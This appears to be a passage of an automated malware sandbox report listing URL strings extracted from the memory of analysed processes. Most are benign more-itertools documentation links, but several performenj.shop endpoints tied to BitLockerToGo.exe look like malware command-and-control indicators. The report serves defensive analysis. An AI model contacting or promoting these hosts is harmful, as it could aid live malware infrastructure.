            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://microsoftgraph.chinacloudapi.cnhttp:
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.SequenceView
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.adjacent
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.all_equal
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.all_unique
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.always_iterable
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.always_reversible
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.before_and_after
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.circular_shifts
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.classify_unique
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.collapse
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.combination_index
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.combination_with_replacement
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.consecutive_groups
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.consumer
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.convolve
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.count_cycle
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.countable
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.dft
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.difference
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.distinct_combinations
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.distinct_permutations
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.dotproduct
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.duplicates_everseen
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.duplicates_justseen
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.exactly_n
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.factor
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.filter_except
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.filter_map
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.first
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.first_true
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.flatten
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.gray_product
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.groupby_transform
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.idft
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.iequals
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.ilen
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.interleave
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.interleave_evenly
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.interleave_longest
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.intersperse
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.is_sorted
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.islice_extended
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.iter_except
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.iter_suppress
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.iterate
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.join_mappings
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.last
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.locate
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.longest_common_prefix
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.lstrip
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.make_decorator
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.map_except
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.map_reduce
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.mark_ends
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.matmul
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.minmax
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.ncycles
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_combination
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_combination_with_replace
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_or_last
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_permutation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.nth_product
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.numeric_range
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.one
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.only
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.outer_product
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.pad_none
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.padded
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.partial_product
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.partitions
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.permutation_index
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.polynomial_derivative
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.polynomial_eval
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.polynomial_from_roots
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.powerset
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.powerset_of_sets
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.prepend
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.product_index
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.quantify
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.random_combination
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.random_combination_with_repl
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.random_permutation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.random_product
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.repeat_each
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.repeat_last
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.replace
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.rlocate
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.roundrobin
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.rstrip
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.run_length
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.sample
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.set_partitions
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.side_effect
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.sieve
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.sort_together
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.strictly_n
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.strip
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.sum_of_squares
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.tail
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.take
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.takewhile_inclusive
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.time_limited
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.totient
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.unique
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.unique_everseen
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.unique_in_window
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.unique_justseen
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.unique_to_each
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.value_chain
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.with_iter
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.zip_broadcast
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.zip_equal
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://more-itertools.readthedocs.io/en/stable/api.html#more_itertools.zip_offset
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://numpy.org
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.typekit.net/p.css?s=1&k=qls3unz&ht=tk&f=139.140.169.173.175.176&a=78030932&app=typekit&e=c
            Source: BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981220898.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980308119.00000000035F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979898744.00000000035E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/
            Source: BitLockerToGo.exe, 00000013.00000003.1979898744.00000000035E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/api
            Source: BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981220898.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980308119.00000000035F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979898744.00000000035E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/om
            Source: BitLockerToGo.exe, 00000013.00000003.1979700668.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000002.1981220898.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1980308119.00000000035F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979898744.00000000035E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/wm
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
